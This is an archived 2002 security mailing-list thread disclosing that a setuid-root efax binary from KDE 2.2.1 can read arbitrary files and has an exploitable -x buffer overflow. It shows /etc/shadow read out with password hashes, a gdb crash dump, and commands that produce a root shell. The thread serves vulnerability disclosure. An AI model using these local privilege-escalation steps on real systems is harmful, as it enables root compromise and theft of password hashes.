Re: efax

From: H D Moore (sflistat_private)
Date: Wed Jan 16 2002 - 01:55:27 PST


    Since this is getting cc'd to bugtraq, here is a little background:
    
    The version of efax I have was part of a kde-2.2.1 source build and install. 
    The efax program was shipped as part of the klprfax app in the kdeutils
    package. The makefile sets this binary to be setuid root on install:
    
    hdm@sliver:~/kdeutils-2.2.1/klprfax > grep chown . -r
    ./efax/fax:     case $OWNER in '') ;; *) chown $OWNER /dev/$DEV ;; esac
    ./efax/Makefile:        @(chown root $(bindir)/efax && chmod 4755 $(bindir)/efax) || echo "Was not able to make efax setuid root"
    ./efax/Makefile.am:     @(chown root $(bindir)/efax && chmod 4755 $(bindir)/efax) || echo "Was not able to make efax setuid root"
    ./efax/Makefile.in:     @(chown root $(bindir)/efax && chmod 4755 $(bindir)/efax) || echo "Was not able to make efax setuid root"
    ./klprfax/klprfax_lpd.in:    chown root $SPOOL/klprfax
    ./klprfax/klprfax_lpd:    chown root $SPOOL/klprfax
    hdm@sliver:~/kdeutils-2.2.1/klprfax >
    
    This has been fixed in KDE 2.2.2 and I have not seen a distro yet that ships 
    with efax installed suid root. However, if you installed KDE 2.2.1 from source,
    then there is a good chance your efax binary is still setuid.
    
    I posted a message to vuln-dev, stating that I found a setuid copy of efax and
    that I was able to read arbitrary files with the -d parameter (/etc/shadow).
    Wodahs responded saying he found an overflow in the -x parameter.
    
    The overflow that he found is easily exploitable:
    
    Running /bin/id:
    
    hdm@sliver> efax -x $EX
    efax: Wed Jan 16 03:43:10 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
    efax: Wed Jan 16 03:43:10 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
    efax: 43:10 compiled Aug 16 2001 10:23:23
    efax: 43:10 Error: can't open pre-lock file <nops>[unprintable shellcode bytes]/bin/idA/TMP..08795: File name too long
    uid=500(hdm) gid=100(users) euid=0(root) groups=100(users)
    
    
    Getting a root shell:
    
    hdm@sliver > echo 'void main(void){setuid(0);system("/bin/sh");}' > /tmp/ex.c
    hdm@sliver > gcc -o /tmp/ex /tmp/ex.c
    /tmp/ex.c: In function `main':
    /tmp/ex.c:1: warning: return type of `main' is not `int'
    hdm@sliver > export EX=`perl genshell.pl 1029 $ADDR`
    shell code is: 43 bytes
    hdm@sliver > efax -x $EX
    efax: Wed Jan 16 03:46:21 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
    efax: Wed Jan 16 03:46:21 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
    efax: 46:21 compiled Aug 16 2001 10:23:23
    efax: 46:21 Error: can't open pre-lock file <nops>[unprintable shellcode bytes]/tmp/exA/TMP..08846: File name too long
    sh-2.04#
    
    On Wednesday 16 January 2002 03:03 am, Wodahs Latigid wrote:
    > I found a buffer overflow in efax a while back,
    > reported it and didn't get a response. Here's
    > the original email:
    > -----------------------------------------------
    > To: edcat_private
    > Subject: Efax Buffer Overflow
    > You may or not be interested (as this has no
    > major impact on the outside world), but there
    > is a buffer overflow in the -x function of
    > efax. Obviously, efax should not be setuid
    > root, but I can imagine a situation with an
    > administrator doing so to give "trusted" users
    > access to the fax facility.
    > -----------------------------------------------
    >
    > And here's more detail:
    >
    > # cat /etc/mandrake-release
    > Linux Mandrake release 8.0 (Traktopel) for i586
    >
    > Starting program: /usr/bin/efax -x `perl -e "print 'A' x 1200"`
    > /usr/bin/efax: Wed Jan 16 09:54:49 2002 efax v 0.9 Copyright 1999 Ed Casas
    > efax: 54:49 Error: can't open pre-lock file AAAA..[A's Cut]..AAAATMP..25717: File name too long
    >
    > Program received signal SIGSEGV, Segmentation fault.
    > 0x41414141 in ?? ()
    > (gdb) inf reg
    > .. stuff cut ..
    > edx            0x65656565       1701143909
    > ebx            0x41414141       1094795585
    > esp            0xbffefd58       0xbffefd58
    > ebp            0x41414141       0x41414141
    > esi            0x41414141       1094795585
    > edi            0x41414141       1094795585
    > eip            0x41414141       0x41414141
    > .. stuff cut ..
    >
    > Digital Shadow
    > http://www.ministryofpeace.co.uk/
    >
    >
    >
    > -----Original Message-----
    > From: H D Moore <sflistat_private>
    > Date: Tue, 15 Jan 2002 18:44:57 -0600
    > To: VULN-DEVat_private
    > Subject: efax
    >
    > > Didn't see this mentioned before...
    > >
    > > hdm@sliver:~ > which efax
    > > /opt/kde2/bin/efax
    > > hdm@sliver:~ > ls -la /opt/kde2/bin/efax
    > > -rwsr-xr-x    1 root     root        96689 Aug 16 10:23 /opt/kde2/bin/efax
    > > hdm@sliver:~ > efax -h
    > > efax: Tue Jan 15 18:43:28 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
    > > efax: Tue Jan 15 18:43:28 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
    > > efax: 43:28 compiled Aug 16 2001 10:23:23
    > > efax: 43:28 Error: no argument for (-h)
    > > Usage:
    > >   efax [ option ]... [ -t num [ file... ] ]
    > > Options:
    > >   -a str  use command ATstr to answer
    > >   -c cap  set modem and receive capabilites to cap
    > >   -d dev  use modem on device dev
    > >   -e cmd  exec "/bin/sh -c cmd" for voice calls
    > >   -f fnt  use (PBM) font file fnt for headers
    > >   -g cmd  exec "/bin/sh -c cmd" for data calls
    > >   -h hdr  use page header hdr (use %d's for current page/total pages)
    > >   -i str  send modem command ATstr at start
    > >   -j str  send modem command ATstr after set fax mode
    > >   -k str  send modem command ATstr when done
    > >   -l id   set local identification to id
    > >   -o opt  use protocol option opt:
    > >       0     use class 2.0 instead of class 2 modem commands
    > >       1     use class 1 modem commands
    > >       2     use class 2 modem commands
    > >       a     if first [data mode] answer attempt fails retry as fax
    > >       e     ignore errors in modem initialization commands
    > >       f     use virtual flow control
    > >       h     use hardware flow control
    > >       l     halve lock file polling interval
    > >       n     ignore page retransmission requests
    > >       r     do not reverse received bit order for Class 2 modems
    > >       x     use XON instead of DC2 to trigger reception
    > >       z     add 100 ms to pause before each modem comand (cumulative)
    > >   -q ne   ask for retransmission if more than ne errors per page
    > >   -r pat  save received pages into files pat.001, pat.002, ...
    > >   -s      share (unlock) modem device while waiting for call
    > >   -v lvl  print messages of type in string lvl (ewinchamr)
    > >   -w      don't answer phone, wait for OK or CONNECT instead
    > >   -x fil  use uucp-style lock file fil
    > > Commands:
    > >   -t      dial num and send fax image files file...
    > > efax: 43:28 done, returning 2 (unrecoverable error)
    > > hdm@sliver:~ > efax -d /etc/shadow
    > > efax: Tue Jan 15 18:43:35 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
    > > efax: Tue Jan 15 18:43:35 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
    > > efax: 43:35 compiled Aug 16 2001 10:23:23
    > > efax: 43:35 opened /etc/shadow
    > > efax: 43:35 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
    > > efax: 43:35 Warning: unexpected response "root:sjSs9mscTsosA:11521:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "bin:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "daemon:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "lp:*:9473:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "news:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "uucp:*:0:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "games:*:0:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "man:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "at:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "lnx:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "mdom:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "yard:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "wwwrun:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "squid:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "postgres:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "fax:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "gnats:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "empress:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "adabas:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "amanda:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "ixess:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "irc:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "ftp:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "firewall:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "informix:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "named:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "virtuoso:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "fnet:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "gdm:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "postfix:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "cyrus:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "nps:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "skyrix:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "dbmaker:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "fixadm:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "fib:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "fixlohn:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "mysql:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "dpbox:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "ingres:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "codadmin:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "zope:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "vscan:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "wnn:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "pop:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "perforce:*:8902:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "nobody:*:0:0:10000::::"
    > > efax: 43:35 Warning: unexpected response "hdm:snBsN0stfzsMg:11564:0:99999:7:0::"
    > > efax: 43:35 Warning: unexpected response "oracle:!:11556:0:99999:3:0::"
    > > efax: 43:35 Warning: unexpected response "yaku:!:11636:0:99999:3:0::"
    > > efax: 43:35 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
    > > efax: 43:35 sync: dropping DTR
    > > efax: 43:35 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
    > > efax: 43:36 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
    > > efax: 43:36 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
    > > efax: 43:36 sync: sending escapes
    > > efax: 43:36 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
    > > efax: 43:36 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
    > > efax: 43:37 Error: sync: modem not responding
    > > efax: 43:37 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
    > > efax: 43:37 done, returning 2 (unrecoverable error)
    > >
    > > --
    > > H D Moore
    > > http://www.digitaldefense.net - work
    > > http://www.digitaloffense.net - play
    
    -- 
    H D Moore
    http://www.digitaldefense.net - work
    http://www.digitaloffense.net - play
    



    This archive was generated by hypermail 2b30 : Wed Jan 16 2002 - 18:18:36 PST